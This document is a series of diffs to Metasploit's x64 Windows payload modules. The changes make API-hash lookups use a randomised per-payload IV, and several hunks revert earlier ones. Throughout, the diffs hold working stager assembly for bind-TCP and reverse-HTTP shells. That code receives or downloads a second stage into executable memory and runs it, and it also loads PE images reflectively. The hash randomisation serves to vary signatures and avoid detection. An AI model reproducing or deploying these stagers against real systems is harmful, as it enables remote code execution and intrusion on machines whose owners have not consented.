-        mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'closesocket')}
+        mov r10d, #{block_api_hash('ws2_32.dll', 'closesocket')}
         call rbp               ; closesocket( s );
 
         ; restore RSP so we dont have any alignment issues with the next block...
@@ -213,7 +214,7 @@ module Payload::Windows::BindTcp_x64
         push 4                 ;
         pop r8                 ; length = sizeof( DWORD );
         mov rcx, rdi           ; the saved socket
-        mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')}
+        mov r10d, #{block_api_hash('ws2_32.dll', 'recv')}
         call rbp               ; recv( s, &dwLength, 4, 0 );
         add rsp, 32            ; we restore RSP from the api_call so we can pop off RSI next
 
@@ -226,7 +227,7 @@ module Payload::Windows::BindTcp_x64
         pop r8                 ; MEM_COMMIT
         mov rdx, rsi           ; the newly received second stage length.
         xor rcx, rcx           ; NULL as we dont care where the allocation is.
-        mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}
+        mov r10d, #{block_api_hash('kernel32.dll', 'VirtualAlloc')}
         call rbp               ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
 
         ; Receive the second stage and execute it...
@@ -238,7 +239,7 @@ module Payload::Windows::BindTcp_x64
         mov r8, rsi            ; length
         mov rdx, rbx           ; the current address into our second stages RWX buffer
         mov rcx, rdi           ; the saved socket
-        mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')}
+        mov r10d, #{block_api_hash('ws2_32.dll', 'recv')}
         call rbp               ; recv( s, buffer, length, 0 );
 
         add rbx, rax           ; buffer += bytes_received

--- a/lib/msf/core/payload/windows/x64/bind_tcp_x64.rb
+++ b/lib/msf/core/payload/windows/x64/bind_tcp_x64.rb
@@ -54,7 +54,6 @@ module Payload::Windows::BindTcp_x64
   # Generate and compile the stager
   #
   def generate_bind_tcp(opts={})
-    block_api_iv # ensure the block API IV is generated before we generate the shellcode so that the hashes are correct
     combined_asm = %Q^
       cld                    ; Clear the direction flag.
       and rsp, 0xFFFFFFFFFFFFFFF0 ; Ensure RSP is 16 byte aligned

--- a/lib/msf/core/payload/windows/x64/block_api_x64.rb
+++ b/lib/msf/core/payload/windows/x64/block_api_x64.rb
@@ -15,6 +15,7 @@ module Payload::Windows::BlockApi_x64
   def block_api_iv
     @block_api_iv ||= rand(0x100000000)
   end
+
   def asm_block_api(opts={})
     @block_api_iv ||= rand(0x100000000)
     asm = Rex::Payloads::Shuffle.from_graphml_file(

--- a/lib/msf/core/payload/windows/x64/block_api_x64.rb
+++ b/lib/msf/core/payload/windows/x64/block_api_x64.rb
@@ -12,8 +12,13 @@ module Payload::Windows::BlockApi_x64
 
   @block_api_iv = nil
 
-  def block_api_iv
-    @block_api_iv ||= rand(0x100000000)
+  def block_api_iv(opts={})
+    if opts.key?(:block_api_iv) && !@block_api_iv.nil? && @block_api_iv != opts[:block_api_iv]
+      print_warning("Warning: block_api_iv is already set to a different value, if you are using an hardcoded value, make sure to call the first function between block_api_iv, asm_block_api and block_api_hash with opts[:block_api_iv] set")
+    end
+    @block_api_iv ||= opts.fetch(:block_api_iv) { rand(0x100000000) }
+    vprint_status("Current block_api_iv: 0x%08x" % @block_api_iv)
+    @block_api_iv
   end
 
   def asm_block_api(opts={})
@@ -24,13 +29,16 @@ module Payload::Windows::BlockApi_x64
     )
     # Patch the assembly to set the correct IV
     # db 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00  =>  mov r9d, <iv>
-    iv_bytes = [block_api_iv].pack('V').bytes.map { |b| "0x%02x" % b }.join(', ')
+    iv_bytes = [block_api_iv(opts)].pack('V').bytes.map { |b| "0x%02x" % b }.join(', ')
     asm.sub!("db 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00", "db 0x41, 0xb9, #{iv_bytes}")
+    unless asm.include?("db 0x41, 0xb9, #{iv_bytes}")
+      raise "Failed to patch block_api assembly with IV #{block_api_iv(opts)} (#{iv_bytes})"
+    end
     asm
   end
 
-  def block_api_hash(mod, func)
-    Rex::Text.block_api_hash(mod, func, iv: block_api_iv)
+  def block_api_hash(mod, func, opts={})
+    Rex::Text.block_api_hash(mod, func, iv: block_api_iv(opts))
   end
 
 end

--- a/lib/msf/core/payload/windows/x64/block_api_x64.rb
+++ b/lib/msf/core/payload/windows/x64/block_api_x64.rb
@@ -33,7 +33,8 @@ module Payload::Windows::BlockApi_x64
   end
 
   def block_api_hash(mod, func, opts={})
-    Rex::Text.block_api_hash(mod, func, iv: block_api_iv(opts))
+    iv = opts.fetch(:block_api_iv) { block_api_iv }
+    Rex::Text.block_api_hash(mod, func, iv: iv)
   end
 
 end

--- a/lib/msf/core/payload/windows/x64/block_api_x64.rb
+++ b/lib/msf/core/payload/windows/x64/block_api_x64.rb
@@ -10,12 +10,27 @@ module Msf
 ###
 module Payload::Windows::BlockApi_x64
 
+  @block_api_iv = nil
+
+  def block_api_iv
+    @block_api_iv ||= rand(0x100000000)
+  end
   def asm_block_api(opts={})
-    Rex::Payloads::Shuffle.from_graphml_file(
+    @block_api_iv ||= rand(0x100000000)
+    asm = Rex::Payloads::Shuffle.from_graphml_file(
       File.join(Msf::Config.install_root, 'data', 'shellcode', 'block_api.x64.graphml'),
       arch: ARCH_X64,
       name: 'api_call'
     )
+    # Patch the assembly to set the correct IV
+    # db 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00  =>  mov r9d, <iv>
+    iv_bytes = [block_api_iv].pack('V').bytes.map { |b| "0x%02x" % b }.join(', ')
+    asm.sub!("db 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00", "db 0x41, 0xb9, #{iv_bytes}")
+    asm
+  end
+
+  def block_api_hash(mod, func)
+    Rex::Text.block_api_hash(mod, func, iv: @block_api_iv)
   end
 
 end

--- a/lib/msf/core/payload/windows/x64/block_api_x64.rb
+++ b/lib/msf/core/payload/windows/x64/block_api_x64.rb
@@ -30,7 +30,7 @@ module Payload::Windows::BlockApi_x64
   end
 
   def block_api_hash(mod, func)
-    Rex::Text.block_api_hash(mod, func, iv: @block_api_iv)
+    Rex::Text.block_api_hash(mod, func, iv: block_api_iv)
   end
 
 end

--- a/lib/msf/core/payload/windows/x64/block_api_x64.rb
+++ b/lib/msf/core/payload/windows/x64/block_api_x64.rb
@@ -22,14 +22,14 @@ module Payload::Windows::BlockApi_x64
       arch: ARCH_X64,
       name: 'api_call'
     )
+    iv = opts.fetch(:block_api_iv) { block_api_iv }
     # Patch the assembly to set the correct IV
     # db 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00  =>  mov r9d, <iv>
-    iv_bytes = [block_api_iv(opts)].pack('V').bytes.map { |b| "0x%02x" % b }.join(', ')
-    asm.sub!("db 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00", "db 0x41, 0xb9, #{iv_bytes}")
-    unless asm.include?("db 0x41, 0xb9, #{iv_bytes}")
-      raise "Failed to patch block_api assembly with IV #{block_api_iv(opts)} (#{iv_bytes})"
+    iv_bytes = [iv].pack('V').bytes.map { |b| "0x%02x" % b }.join(', ')
+    unless asm.include?("db 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00")
+      raise "Failed to patch block_api assembly with IV 0x#{iv.to_s(16).rjust(8, '0')} (#{iv_bytes})"
     end
-    asm
+    asm.sub!("db 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00", "db 0x41, 0xb9, #{iv_bytes}")
   end
 
   def block_api_hash(mod, func, opts={})

--- a/lib/msf/core/payload/windows/x64/block_api_x64.rb
+++ b/lib/msf/core/payload/windows/x64/block_api_x64.rb
@@ -17,7 +17,6 @@ module Payload::Windows::BlockApi_x64
   end
 
   def asm_block_api(opts={})
-    @block_api_iv ||= rand(0x100000000)
     asm = Rex::Payloads::Shuffle.from_graphml_file(
       File.join(Msf::Config.install_root, 'data', 'shellcode', 'block_api.x64.graphml'),
       arch: ARCH_X64,

--- a/lib/msf/core/payload/windows/x64/block_api_x64.rb
+++ b/lib/msf/core/payload/windows/x64/block_api_x64.rb
@@ -13,12 +13,7 @@ module Payload::Windows::BlockApi_x64
   @block_api_iv = nil
 
   def block_api_iv(opts={})
-    if opts.key?(:block_api_iv) && !@block_api_iv.nil? && @block_api_iv != opts[:block_api_iv]
-      print_warning("Warning: block_api_iv is already set to a different value, if you are using an hardcoded value, make sure to call the first function between block_api_iv, asm_block_api and block_api_hash with opts[:block_api_iv] set")
-    end
-    @block_api_iv ||= opts.fetch(:block_api_iv) { rand(0x100000000) }
-    vprint_status("Current block_api_iv: 0x%08x" % @block_api_iv)
-    @block_api_iv
+    @block_api_iv ||= rand(0x100000000)
   end
 
   def asm_block_api(opts={})

--- a/lib/msf/core/payload/windows/x64/exitfunk_x64.rb
+++ b/lib/msf/core/payload/windows/x64/exitfunk_x64.rb
@@ -43,7 +43,7 @@ module Payload::Windows::Exitfunk_x64
       asm << %Q^
         push 0                ;
         pop rcx               ; set the exit function parameter
-        mov r10, #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')}
+        mov r10, #{block_api_hash('kernel32.dll', 'ExitProcess')}
         call rbp              ; ExitProcess(0)
       ^
 
@@ -51,7 +51,7 @@ module Payload::Windows::Exitfunk_x64
       asm << %Q^
         push 300000           ; 300 seconds
         pop rcx               ; set the sleep function parameter
-        mov r10, #{Rex::Text.block_api_hash('kernel32.dll', 'Sleep')}
+        mov r10, #{block_api_hash('kernel32.dll', 'Sleep')}
         call rbp              ; Sleep(30000)
         jmp exitfunk          ; repeat
       ^

--- a/lib/msf/core/payload/windows/x64/exitfunk_x64.rb
+++ b/lib/msf/core/payload/windows/x64/exitfunk_x64.rb
@@ -43,7 +43,7 @@ module Payload::Windows::Exitfunk_x64
       asm << %Q^
         push 0                ;
         pop rcx               ; set the exit function parameter
-        mov r10, #{block_api_hash('kernel32.dll', 'ExitProcess')}
+        mov r10d, #{block_api_hash('kernel32.dll', 'ExitProcess')}
         call rbp              ; ExitProcess(0)
       ^
 
@@ -51,7 +51,7 @@ module Payload::Windows::Exitfunk_x64
       asm << %Q^
         push 300000           ; 300 seconds
         pop rcx               ; set the sleep function parameter
-        mov r10, #{block_api_hash('kernel32.dll', 'Sleep')}
+        mov r10d, #{block_api_hash('kernel32.dll', 'Sleep')}
         call rbp              ; Sleep(30000)
         jmp exitfunk          ; repeat
       ^

--- a/lib/msf/core/payload/windows/x64/exitfunk_x64.rb
+++ b/lib/msf/core/payload/windows/x64/exitfunk_x64.rb
@@ -23,7 +23,7 @@ module Payload::Windows::Exitfunk_x64
       asm << %Q^
         push 0                ;
         pop rcx               ; set the exit function parameter
-        mov ebx, 0x#{Msf::Payload::Windows.exit_types['seh'].to_s(16)}
+        mov ebx, #{block_api_hash('kernel32.dll', 'SetUnhandledExceptionFilter')}
         mov r10d, ebx         ; place the correct EXITFUNK into r10d
         call rbp              ; SetUnhandledExceptionFilter(0)
         push 0                ;
@@ -34,7 +34,7 @@ module Payload::Windows::Exitfunk_x64
       asm << %Q^
         push 0                ;
         pop rcx               ; set the exit function parameter
-        mov ebx, 0x#{Msf::Payload::Windows.exit_types['thread'].to_s(16)}
+        mov ebx, #{block_api_hash('kernel32.dll', 'ExitThread')}
         mov r10d, ebx         ; place the correct EXITFUNK into r10d
         call rbp              ; call EXITFUNK( 0 );
       ^

--- a/lib/msf/core/payload/windows/x64/migrate_common_x64.rb
+++ b/lib/msf/core/payload/windows/x64/migrate_common_x64.rb
@@ -18,6 +18,7 @@ module Payload::Windows::MigrateCommon_x64
   # Constructs the migrate stub on the fly
   #
   def generate(opts={})
+    block_api_iv # ensure the block API IV is generated before we generate the shellcode so that the hashes are correct
     asm = %Q^
     migrate:
       cld
@@ -31,7 +32,7 @@ module Payload::Windows::MigrateCommon_x64
     #{generate_migrate(opts)}
     signal_event:
       mov rcx, qword [rsi] ; Event handle is pointed at by rsi
-      mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'SetEvent')}
+      mov r10d, #{block_api_hash('kernel32.dll', 'SetEvent')}
       call rbp            ; SetEvent(handle)
     call_payload:
       call qword [rsi+8]  ; Invoke the associated payload

--- a/lib/msf/core/payload/windows/x64/migrate_common_x64.rb
+++ b/lib/msf/core/payload/windows/x64/migrate_common_x64.rb
@@ -18,7 +18,6 @@ module Payload::Windows::MigrateCommon_x64
   # Constructs the migrate stub on the fly
   #
   def generate(opts={})
-    block_api_iv # ensure the block API IV is generated before we generate the shellcode so that the hashes are correct
     asm = %Q^
     migrate:
       cld

--- a/lib/msf/core/payload/windows/x64/migrate_named_pipe_x64.rb
+++ b/lib/msf/core/payload/windows/x64/migrate_named_pipe_x64.rb
@@ -32,7 +32,7 @@ module Payload::Windows::MigrateNamedPipe_x64
       mov rdi, qword [rsi+16]   ; The duplicated pipe handle is in the migrate context.
     signal_pipe_event:
       mov rcx, qword [rsi]      ; Event handle is pointed at by rsi
-      mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'SetEvent')}
+      mov r10d, #{block_api_hash('kernel32.dll', 'SetEvent')}
       call rbp                  ; SetEvent(handle)
     call_pipe_payload:
       call qword [rsi+8]        ; call the associated payload

--- a/lib/msf/core/payload/windows/x64/migrate_tcp_x64.rb
+++ b/lib/msf/core/payload/windows/x64/migrate_tcp_x64.rb
@@ -38,13 +38,13 @@ module Payload::Windows::MigrateTcp_x64
       sub rsp, #{WSA_SIZE}      ; alloc size, plus alignment (used later)
       mov r13, rsp              ; save pointer to this struct
       sub rsp, 0x28             ; space for api function calls (really?)
-      mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')}
+      mov r10d, #{block_api_hash('kernel32.dll', 'LoadLibraryA')}
       call rbp                  ; LoadLibraryA('ws2_32')
     init_networking:
       mov rdx, r13              ; pointer to the wsadata struct
       push 2
       pop rcx                   ; Version = 2
-      mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'WSAStartup')}
+      mov r10d, #{block_api_hash('ws2_32.dll', 'WSAStartup')}
       call rbp                  ; WSAStartup(Version, &WSAData)
     create_socket:
       xor r8, r8                ; protocol not specified
@@ -55,7 +55,7 @@ module Payload::Windows::MigrateTcp_x64
       pop rdx                   ; SOCK_STREAM
       push 2
       pop rcx                   ; AF_INET
-      mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'WSASocketA')}
+      mov r10d, #{block_api_hash('ws2_32.dll', 'WSASocketA')}
       call rbp                  ; WSASocketA(AF_INET, SOCK_STREAM, 0, &info, 0, 0)
       xchg rdi, rax
     ^

--- a/lib/msf/core/payload/windows/x64/reflective_pe_loader_x64.rb
+++ b/lib/msf/core/payload/windows/x64/reflective_pe_loader_x64.rb
@@ -4,6 +4,7 @@ module Msf
   module Payload::Windows::ReflectivePELoader_x64
     include Payload::Windows::BlockApi_x64
     def asm_reflective_pe_loader_x64(opts)
+      block_api_iv # ensure the block API IV is generated before we generate the shellcode so that the hashes are correct
 
       prologue = ''
       if opts[:is_dll] == true
@@ -30,7 +31,7 @@ stub:
   mov rdx,[rsp]                   ; dwSize
   xor rcx,rcx                     ; lpAddress
   xchg rsp,rbp                    ; Swap shadow stack
-  mov r10d,#{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}
+  mov r10d,#{block_api_hash('kernel32.dll', 'VirtualAlloc')}
   call api_call                   ; VirtualAlloc(lpAddress,dwSize,MEM_COMMIT|MEM_TOP_DOWN|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
   xchg rsp,rbp                    ; Swap shadow stack
   mov rdi,rax                     ; Save the new base address to rdi
@@ -123,7 +124,7 @@ all_resolved:
 LoadLibraryA:
   ;mov rcx,rax                     ; Move the address of library name string to RCX
   xchg rbp,rsp                     ; Swap shadow stack
-  mov r10d,#{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')}
+  mov r10d,#{block_api_hash('kernel32.dll', 'LoadLibraryA')}
   call api_call                   ; LoadLibraryA(RCX)
   xchg rbp,rsp                    ; Swap shadow stack
   ret                             ; <-
@@ -131,7 +132,7 @@ GetProcAddress:
   xchg rbp,rsp                    ; Swap shadow stack
   mov rcx,r13                     ; Move the module handle to RCX as first parameter
   mov rdx,rax                     ; Move the address of function name string to RDX as second parameter
-  mov r10d,#{Rex::Text.block_api_hash('kernel32.dll', 'GetProcAddress')}
+  mov r10d,#{block_api_hash('kernel32.dll', 'GetProcAddress')}
   call api_call                   ; GetProcAddress(ebx,[esp+4])
   xchg rbp,rsp                    ; Swap shadow stack
   ret                             ; <-
@@ -154,7 +155,7 @@ PE_start:
   xor rdx,rdx                     ; lpBaseAddress
   xor r8,r8                       ; hProcess
   xchg rbp,rsp                    ; Swap shadow stack
-  mov r10d,#{Rex::Text.block_api_hash('kernel32.dll', 'FlushInstructionCache')}
+  mov r10d,#{block_api_hash('kernel32.dll', 'FlushInstructionCache')}
   call api_call                   ; FlushInstructionCache(0xffffffff,NULL,NULL);
   #{prologue}
   add r13,r12                     ; Add the address of entry value to image base

--- a/lib/msf/core/payload/windows/x64/reflective_pe_loader_x64.rb
+++ b/lib/msf/core/payload/windows/x64/reflective_pe_loader_x64.rb
@@ -4,8 +4,6 @@ module Msf
   module Payload::Windows::ReflectivePELoader_x64
     include Payload::Windows::BlockApi_x64
     def asm_reflective_pe_loader_x64(opts)
-      block_api_iv # ensure the block API IV is generated before we generate the shellcode so that the hashes are correct
-
       prologue = ''
       if opts[:is_dll] == true
         prologue = %(

--- a/lib/msf/core/payload/windows/x64/reverse_http_x64.rb
+++ b/lib/msf/core/payload/windows/x64/reverse_http_x64.rb
@@ -241,7 +241,7 @@ module Payload::Windows::ReverseHttp_x64
         mov r14, 'wininet'
         push r14                      ; Push 'wininet',0 onto the stack
         mov rcx, rsp                  ; lpFileName (stackpointer)
-        mov r10, #{block_api_hash('kernel32.dll', 'LoadLibraryA')}
+        mov r10d, #{block_api_hash('kernel32.dll', 'LoadLibraryA')}
         call rbp
 
       internetopen:
@@ -283,7 +283,7 @@ module Payload::Windows::ReverseHttp_x64
         xor r9, r9                    ; lpszProxyBypass (NULL)
         push rbx                      ; stack alignment
         push rbx                      ; dwFlags (0)
-        mov r10, #{block_api_hash('wininet.dll', 'InternetOpenA')}
+        mov r10d, #{block_api_hash('wininet.dll', 'InternetOpenA')}
         call rbp
 
         call load_server_host
@@ -297,7 +297,7 @@ module Payload::Windows::ReverseHttp_x64
         push rbx                      ; dwFlags (0)
         push 3                        ; dwService (3=INTERNET_SERVICE_HTTP)
         push rbx                      ; lpszPassword (NULL)
-        mov r10, #{block_api_hash('wininet.dll', 'InternetConnectA')}
+        mov r10d, #{block_api_hash('wininet.dll', 'InternetConnectA')}
         call rbp
     ^
 
@@ -317,7 +317,7 @@ module Payload::Windows::ReverseHttp_x64
         pop rdx
         push #{proxy_user.length}     ; dwBufferLength (proxy_user length)
         pop r9
-        mov r10, #{block_api_hash('wininet.dll', 'InternetSetOptionA')}
+        mov r10d, #{block_api_hash('wininet.dll', 'InternetSetOptionA')}
         call rbp
         ^
       end
@@ -333,7 +333,7 @@ module Payload::Windows::ReverseHttp_x64
         pop rdx
         push #{proxy_pass.length}     ; dwBufferLength (proxy_pass length)
         pop r9
-        mov r10, #{block_api_hash('wininet.dll', 'InternetSetOptionA')}
+        mov r10d, #{block_api_hash('wininet.dll', 'InternetSetOptionA')}
         call rbp
         ^
       end
@@ -357,7 +357,7 @@ module Payload::Windows::ReverseHttp_x64
         push rax
         push rbx                      ; lplpszAcceptType (NULL)
         push rbx                      ; lpszReferer (NULL)
-        mov r10, #{block_api_hash('wininet.dll', 'HttpOpenRequestA')}
+        mov r10d, #{block_api_hash('wininet.dll', 'HttpOpenRequestA')}
         call rbp
 
       prepare:
@@ -386,7 +386,7 @@ module Payload::Windows::ReverseHttp_x64
         mov r8, rsp                   ; lpBuffer (pointer to flags)
         push 4
         pop r9                        ; dwBufferLength (4 = size of flags)
-        mov r10, #{block_api_hash('wininet.dll', 'InternetSetOptionA')}
+        mov r10d, #{block_api_hash('wininet.dll', 'InternetSetOptionA')}
         call rbp
 
         xor r8, r8                    ; dwHeadersLen (0)
@@ -415,14 +415,14 @@ module Payload::Windows::ReverseHttp_x64
         xor r9, r9                    ; lpszVersion (NULL)
         push rbx                      ; stack alignment
         push rbx                      ; dwOptionalLength (0)
-        mov r10, #{block_api_hash('wininet.dll', 'HttpSendRequestA')}
+        mov r10d, #{block_api_hash('wininet.dll', 'HttpSendRequestA')}
         call rbp
         test eax, eax
         jnz allocate_memory
 
       set_wait:
         mov rcx, #{retry_wait}        ; dwMilliseconds
-        mov r10, #{block_api_hash('kernel32.dll', 'Sleep')}
+        mov r10d, #{block_api_hash('kernel32.dll', 'Sleep')}
         call rbp                      ; Sleep( dwMilliseconds );
     ^
 
@@ -450,7 +450,7 @@ module Payload::Windows::ReverseHttp_x64
       asm << %Q^
       failure:
         ; hard-coded to ExitProcess(whatever) for size
-        mov r10, #{block_api_hash('kernel32.dll', 'ExitProcess')}
+        mov r10d, #{block_api_hash('kernel32.dll', 'ExitProcess')}
         call rbp              ; ExitProcess(whatever)
       ^
     end
@@ -473,7 +473,7 @@ module Payload::Windows::ReverseHttp_x64
         push 4
         pop r8                        ; dwNumberOfBytesToRead (4 bytes)
         mov rcx, rsi                  ; hFile (request handle)
-        mov r10, #{block_api_hash('wininet.dll', 'InternetReadFile')}
+        mov r10d, #{block_api_hash('wininet.dll', 'InternetReadFile')}
         call rbp
         test eax, eax                 ; did the download fail?
         jz failure
@@ -486,7 +486,7 @@ module Payload::Windows::ReverseHttp_x64
         push 0x40
         pop r9                        ; flProtect (0x40=PAGE_EXECUTE_READWRITE)
         mov r8, 0x1000                ; flAllocationType (0x1000=MEM_COMMIT)
-        mov r10, #{block_api_hash('kernel32.dll', 'VirtualAlloc')}
+        mov r10d, #{block_api_hash('kernel32.dll', 'VirtualAlloc')}
         call rbp
         ;download stage
       download_prep:
@@ -498,7 +498,7 @@ module Payload::Windows::ReverseHttp_x64
         mov r8, rax                   ; dwNumberOfBytesToRead (incoming stage size)
         mov rdx, rbx                  ; lpBuffer (pointer to mem)
         mov r9, rdi                   ; lpdwNumberOfByteRead (stack pointer)
-        mov r10, #{block_api_hash('wininet.dll', 'InternetReadFile')}
+        mov r10d, #{block_api_hash('wininet.dll', 'InternetReadFile')}
         call rbp
         add rsp, 32                   ; clean up reserved space
         test eax, eax                 ; did the download fail?
@@ -516,7 +516,7 @@ module Payload::Windows::ReverseHttp_x64
         mov r9, rdx                   ; flProtect (0x40=PAGE_EXECUTE_READWRITE)
         shl edx, 16                   ; dwSize
         mov r8, 0x1000                ; flAllocationType (0x1000=MEM_COMMIT)
-        mov r10, #{block_api_hash('kernel32.dll', 'VirtualAlloc')}
+        mov r10d, #{block_api_hash('kernel32.dll', 'VirtualAlloc')}
         call rbp
 
       download_prep:
@@ -530,7 +530,7 @@ module Payload::Windows::ReverseHttp_x64
         mov rdx, rbx                  ; lpBuffer (pointer to mem)
         mov r8, 8192                  ; dwNumberOfBytesToRead (8k)
         mov r9, rdi                   ; lpdwNumberOfByteRead (stack pointer)
-        mov r10, #{block_api_hash('wininet.dll', 'InternetReadFile')}
+        mov r10d, #{block_api_hash('wininet.dll', 'InternetReadFile')}
         call rbp
         add rsp, 32                   ; clean up reserved space
 

--- a/lib/msf/core/payload/windows/x64/reverse_http_x64.rb
+++ b/lib/msf/core/payload/windows/x64/reverse_http_x64.rb
@@ -86,6 +86,7 @@ module Payload::Windows::ReverseHttp_x64
   # Generate and compile the stager
   #
   def generate_reverse_http(opts={})
+    block_api_iv # ensure the block API IV is generated before we generate the shellcode so that the hashes are correct
     combined_asm = %Q^
       cld                 ; Clear the direction flag.
       and rsp, ~0xf       ; Ensure RSP is 16 byte aligned
@@ -240,7 +241,7 @@ module Payload::Windows::ReverseHttp_x64
         mov r14, 'wininet'
         push r14                      ; Push 'wininet',0 onto the stack
         mov rcx, rsp                  ; lpFileName (stackpointer)
-        mov r10, #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')}
+        mov r10, #{block_api_hash('kernel32.dll', 'LoadLibraryA')}
         call rbp
 
       internetopen:
@@ -282,7 +283,7 @@ module Payload::Windows::ReverseHttp_x64
         xor r9, r9                    ; lpszProxyBypass (NULL)
         push rbx                      ; stack alignment
         push rbx                      ; dwFlags (0)
-        mov r10, #{Rex::Text.block_api_hash('wininet.dll', 'InternetOpenA')}
+        mov r10, #{block_api_hash('wininet.dll', 'InternetOpenA')}
         call rbp
 
         call load_server_host
@@ -296,7 +297,7 @@ module Payload::Windows::ReverseHttp_x64
         push rbx                      ; dwFlags (0)
         push 3                        ; dwService (3=INTERNET_SERVICE_HTTP)
         push rbx                      ; lpszPassword (NULL)
-        mov r10, #{Rex::Text.block_api_hash('wininet.dll', 'InternetConnectA')}
+        mov r10, #{block_api_hash('wininet.dll', 'InternetConnectA')}
         call rbp
     ^
 
@@ -316,7 +317,7 @@ module Payload::Windows::ReverseHttp_x64
         pop rdx
         push #{proxy_user.length}     ; dwBufferLength (proxy_user length)
         pop r9
-        mov r10, #{Rex::Text.block_api_hash('wininet.dll', 'InternetSetOptionA')}
+        mov r10, #{block_api_hash('wininet.dll', 'InternetSetOptionA')}
         call rbp
         ^
       end
@@ -332,7 +333,7 @@ module Payload::Windows::ReverseHttp_x64
         pop rdx
         push #{proxy_pass.length}     ; dwBufferLength (proxy_pass length)
         pop r9
-        mov r10, #{Rex::Text.block_api_hash('wininet.dll', 'InternetSetOptionA')}
+        mov r10, #{block_api_hash('wininet.dll', 'InternetSetOptionA')}
         call rbp
         ^
       end
@@ -356,7 +357,7 @@ module Payload::Windows::ReverseHttp_x64
         push rax
         push rbx                      ; lplpszAcceptType (NULL)
         push rbx                      ; lpszReferer (NULL)
-        mov r10, #{Rex::Text.block_api_hash('wininet.dll', 'HttpOpenRequestA')}
+        mov r10, #{block_api_hash('wininet.dll', 'HttpOpenRequestA')}
         call rbp
 
       prepare:
@@ -385,7 +386,7 @@ module Payload::Windows::ReverseHttp_x64
         mov r8, rsp                   ; lpBuffer (pointer to flags)
         push 4
         pop r9                        ; dwBufferLength (4 = size of flags)
-        mov r10, #{Rex::Text.block_api_hash('wininet.dll', 'InternetSetOptionA')}
+        mov r10, #{block_api_hash('wininet.dll', 'InternetSetOptionA')}
         call rbp
 
         xor r8, r8                    ; dwHeadersLen (0)
@@ -414,14 +415,14 @@ module Payload::Windows::ReverseHttp_x64
         xor r9, r9                    ; lpszVersion (NULL)
         push rbx                      ; stack alignment
         push rbx                      ; dwOptionalLength (0)
-        mov r10, #{Rex::Text.block_api_hash('wininet.dll', 'HttpSendRequestA')}
+        mov r10, #{block_api_hash('wininet.dll', 'HttpSendRequestA')}
         call rbp
         test eax, eax
         jnz allocate_memory
 
       set_wait:
         mov rcx, #{retry_wait}        ; dwMilliseconds
-        mov r10, #{Rex::Text.block_api_hash('kernel32.dll', 'Sleep')}
+        mov r10, #{block_api_hash('kernel32.dll', 'Sleep')}
         call rbp                      ; Sleep( dwMilliseconds );
     ^
 
@@ -449,7 +450,7 @@ module Payload::Windows::ReverseHttp_x64
       asm << %Q^
       failure:
         ; hard-coded to ExitProcess(whatever) for size
-        mov r10, #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')}
+        mov r10, #{block_api_hash('kernel32.dll', 'ExitProcess')}
         call rbp              ; ExitProcess(whatever)
       ^
     end
@@ -472,7 +473,7 @@ module Payload::Windows::ReverseHttp_x64
         push 4
         pop r8                        ; dwNumberOfBytesToRead (4 bytes)
         mov rcx, rsi                  ; hFile (request handle)
-        mov r10, #{Rex::Text.block_api_hash('wininet.dll', 'InternetReadFile')}
+        mov r10, #{block_api_hash('wininet.dll', 'InternetReadFile')}
         call rbp
         test eax, eax                 ; did the download fail?
         jz failure
@@ -485,7 +486,7 @@ module Payload::Windows::ReverseHttp_x64
         push 0x40
         pop r9                        ; flProtect (0x40=PAGE_EXECUTE_READWRITE)
         mov r8, 0x1000                ; flAllocationType (0x1000=MEM_COMMIT)
-        mov r10, #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}
+        mov r10, #{block_api_hash('kernel32.dll', 'VirtualAlloc')}
         call rbp
         ;download stage
       download_prep:
@@ -497,7 +498,7 @@ module Payload::Windows::ReverseHttp_x64
         mov r8, rax                   ; dwNumberOfBytesToRead (incoming stage size)
         mov rdx, rbx                  ; lpBuffer (pointer to mem)
         mov r9, rdi                   ; lpdwNumberOfByteRead (stack pointer)
-        mov r10, #{Rex::Text.block_api_hash('wininet.dll', 'InternetReadFile')}
+        mov r10, #{block_api_hash('wininet.dll', 'InternetReadFile')}
         call rbp
         add rsp, 32                   ; clean up reserved space
         test eax, eax                 ; did the download fail?
@@ -515,7 +516,7 @@ module Payload::Windows::ReverseHttp_x64
         mov r9, rdx                   ; flProtect (0x40=PAGE_EXECUTE_READWRITE)
         shl edx, 16                   ; dwSize
         mov r8, 0x1000                ; flAllocationType (0x1000=MEM_COMMIT)
-        mov r10, #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}
+        mov r10, #{block_api_hash('kernel32.dll', 'VirtualAlloc')}
         call rbp
 
       download_prep:
@@ -529,7 +530,7 @@ module Payload::Windows::ReverseHttp_x64
         mov rdx, rbx                  ; lpBuffer (pointer to mem)
         mov r8, 8192                  ; dwNumberOfBytesToRead (8k)
         mov r9, rdi                   ; lpdwNumberOfByteRead (stack pointer)
-        mov r10, #{Rex::Text.block_api_hash('wininet.dll', 'InternetReadFile')}
+        mov r10, #{block_api_hash('wininet.dll', 'InternetReadFile')}
         call rbp
         add rsp, 32                   ; clean up reserved space
 

--- a/lib/msf/core/payload/windows/x64/reverse_http_x64.rb
+++ b/lib/msf/core/payload/windows/x64/reverse_http_x64.rb
